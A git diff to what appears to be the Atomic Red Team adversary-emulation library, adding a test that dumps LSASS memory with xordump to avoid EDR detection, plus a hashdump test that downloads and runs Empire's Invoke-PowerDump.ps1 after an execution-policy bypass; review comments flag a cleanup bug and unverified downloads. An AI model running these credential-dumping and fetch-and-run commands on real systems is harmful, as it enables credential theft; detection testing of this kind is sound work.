diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 8a3b34df..5381987b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0d36ac..aed4c67a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d9a87458..d3f145a5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -450,6 +450,7 @@
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d2bd5efb..c3d3acfa 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -50,6 +50,7 @@
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 71ce48ba..9c28f3bc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20953,6 +20953,43 @@ credential-access:
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: 'del #{output_file}
+'
+ name: powershell
+ elevation_required: true
+ - name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: "The memory of lsass.exe is often dumped for offline credential
+ theft attacks. This can be achieved by\nimporting built-in DLLs and calling
+ exported functions. Xordump will re-read the resulting minidump \nfile and
+ delete it immediately to avoid brittle EDR detections that signature lsass
+ minidump files.\n\nUpon successful execution, you should see the following
+ file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: 'Computer must have xordump.exe
+
+'
+ prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe"
+ -OutFile #{xordump_exe}
+
+'
+ executor:
+ command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
+ cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore
+
'
name: powershell
elevation_required: true
@@ -22732,7 +22769,7 @@ credential-access:
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index aad552e0..26822e04 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -48,6 +48,8 @@ The following SSPs can be used to access credentials:
- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
+- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
+
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
+
+
+
+## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe|
+| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+#{xordump_exe} -out #{output_file} -x 0x41
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item ${output_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must have xordump.exe
+##### Check Prereq Commands:
+```powershell
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+```
+
+
+
+
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 2014b6e2..eb902b08 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -138,6 +138,7 @@ atomic_tests:
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
+
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
@@ -158,6 +159,7 @@ atomic_tests:
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
+
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
@@ -354,3 +356,37 @@ atomic_tests:
del #{output_file}
name: powershell
elevation_required: true
+
+- name: Dump LSASS.exe using imported Microsoft DLLs
+ auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
+ importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
+ file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
+
+ Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
+ supported_platforms:
+ - windows
+ input_arguments:
+ xordump_exe:
+ description: Path to xordump
+ type: Path
+ default: C:\Windows\Temp\xordump.exe
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
+ dependencies:
+ - description: |
+ Computer must have xordump.exe
+ prereq_command: |
+ if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
+ executor:
+ command: |
+ #{xordump_exe} -out #{output_file} -x 0x41
+ cleanup_command: |
+ Remove-Item ${output_file} -ErrorAction Ignore
+ name: powershell
+ elevation_required: true
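Review bot: The cleanup_command of the new test uses PowerShell variable syntax, `Remove-Item ${output_file} -ErrorAction Ignore`, while every other field in the same test (`-out #{output_file}`, `Test-Path '#{xordump_exe}'`) uses the framework's `#{...}` input-argument placeholder; `$output_file` is not a variable the executor defines, so it expands to nothing, the dump at the `output_file` path is never removed, and `-ErrorAction Ignore` hides the failure. Change it to `Remove-Item #{output_file} -ErrorAction Ignore`. The description also tells the reader to expect the file at `$env:TEMP\lsass-xordump.t1003.001.dmp` whereas the `output_file` default is `C:\Windows\Temp\lsass-xordump.t1003.001.dmp`, and it states that xordump deletes the minidump itself; the expected-artifact sentence should match the default path so anyone validating a detection against this test looks in the right place. The get_prereq_command downloads a release binary with no integrity check, and since the URL is already pinned to the v0.0.1 tag, comparing `(Get-FileHash '#{xordump_exe}').Hash` against a known value (`<xordump_v0.0.1_sha256>`, a placeholder — the hash is not on this page) inside prereq_command would verify what was fetched rather than merely that a file exists. The same text is repeated in the generated copies in atomics/Indexes/index.yaml and atomics/T1003.001/T1003.001.md, which should be regenerated after the fix.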
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index d2b817bc..1516c1da 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry.
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-Import-Module .\PowerDump.ps1
+Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
```
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 081107a1..958fac22 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -94,7 +94,7 @@ atomic_tests:
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
- Import-Module .\PowerDump.ps1
+ Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
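Review bot: The new `Import-Module "$Env:Temp\PowerDump.ps1"` line imports the script from the fixed download location, but the script is still loaded with no integrity check after being fetched; the URL already pins a specific Empire commit, so a `Get-FileHash` comparison against a known value (`<powerdump_ps1_sha256>`, a placeholder — the hash is not on this page) placed before the import would make that pin enforceable rather than advisory. The downloaded file stays at `$Env:Temp\PowerDump.ps1` unless a cleanup_command outside this hunk removes it, which is worth confirming since the command block begins before the hunk. The same command text appears in the generated copies in atomics/Indexes/index.yaml and atomics/T1003.002/T1003.002.md.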
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index eba1dedd..d80b426b 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d
e86f1b4b-fcc1-4a2a-ae10-b49da01458db
10447c83-fc38-462a-a936-5102363b1c43
fcbdd43f-f4ad-42d5-98f3-0218097e2720
+86fc3f40-237f-4701-b155-81c01c48d697